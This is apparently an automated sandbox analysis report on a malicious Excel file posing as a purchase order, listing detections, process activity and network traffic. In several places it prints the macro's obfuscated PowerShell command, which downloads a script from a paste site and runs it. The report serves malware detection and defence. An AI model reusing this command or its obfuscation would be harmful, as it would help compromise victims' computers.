Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order.xls

Overview

General Information

Sample Name:Purchase Order.xls
Analysis ID:372800
MD5:25d108bb3181b08a9fb2edc6713323b2
SHA1:e9983f38587f57213137c534be223a8931e33e2c
SHA256:744cfa43336e162820a03f1a6b2ff7fa9d2471f92f14691c5f59156c634d8015
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2028 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • powershell.exe (PID: 2532 cmdline: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Purchase Order.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x10aba:$s1: Excel
  • 0x10c6b:$s1: Excel
  • 0x10c8e:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

barindex
Sigma detected: Powershell Download and Execute IEXShow sources
Source: Process startedAuthor: Joe Security: Data: Command: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), ProcessId: 2532
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc'), ProcessId: 2532

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Purchase Order.xlsVirustotal: Detection: 11%Perma Link
Source: Purchase Order.xlsReversingLabs: Detection: 13%
Source: unknownHTTPS traffic detected: 104.21.45.223:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: :ystem.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000002.00000002.2086248341.000000001B7E0000.00000002.00000001.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficDNS query: name: paste.ee
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.45.223:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.219.133:80

Networking:

barindex
Connects to a pastebin service (likely for C&C)Show sources
Source: unknownDNS query: name: paste.ee
Source: unknownDNS query: name: paste.ee
Source: global trafficHTTP traffic detected: GET /r/r87uc HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.45.223 104.21.45.223
Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknownHTTPS traffic detected: 104.21.45.223:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /r/r87uc HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: paste.ee
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000002.00000002.2085990289.000000001B345000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000002.00000002.2085990289.000000001B345000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000002.00000002.2085990289.000000001B345000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000002.00000002.2084310798.0000000003574000.00000004.00000001.sdmpString found in binary or memory: http://paste.ee
Source: powershell.exe, 00000002.00000002.2084310798.0000000003574000.00000004.00000001.sdmpString found in binary or memory: http://paste.ee/r/r87uc
Source: powershell.exe, 00000002.00000002.2080278425.0000000002250000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000002.00000002.2080278425.0000000002250000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000002.00000002.2085990289.000000001B345000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.c
Source: powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000002.00000002.2084501852.0000000003679000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee
Source: powershell.exe, 00000002.00000002.2084501852.0000000003679000.00000004.00000001.sdmpString found in binary or memory: https://paste.ee/r/r87uc
Source: powershell.exe, 00000002.00000002.2084501852.0000000003679000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Source: Purchase Order.xlsOLE indicator, VBA macros: true
Source: Purchase Order.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.troj.expl.winXLS@3/7@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\4DBE0000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB75C.tmpJump to behavior
Source: Purchase Order.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......#.........d.......i.....0.........i.......d.....`If........v.....................Km.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....{................-.............}..v....H|......0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.n.e.d. .a.n. .e.r.r.o.r.:. .(.5.0.2.). .B.a.d. .G.a.t.e.w.a.y..."............#k.....F.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......................-.............}..v....x.......0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.-.............}..v............0.X..............#k.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....@.................-.............}..v............0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............k..j....@'k...............-.............}..v............0.X.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....@.................-.............}..v............0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S.......e./.r./.r.8.7.u.c.'.).............-.............}..v....X.......0.X..............#k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......................-.............}..v............0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............k..j....@'k...............-.............}..v....P.......0.X.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......................-.............}..v............0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............k..j....@'k...............-.............}..v............0.X.....................f.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....x.................-.............}..v............0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... .......k..j....@'k...............-.............}..v............0.X..............#k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j....@.................-.............}..v............0.X..............$k.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Purchase Order.xlsVirustotal: Detection: 11%
Source: Purchase Order.xlsReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: :ystem.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000002.00000002.2086248341.000000001B7E0000.00000002.00000001.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000002.00000002.2081122990.0000000002BC7000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')Jump to behavior
Suspicious powershell command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
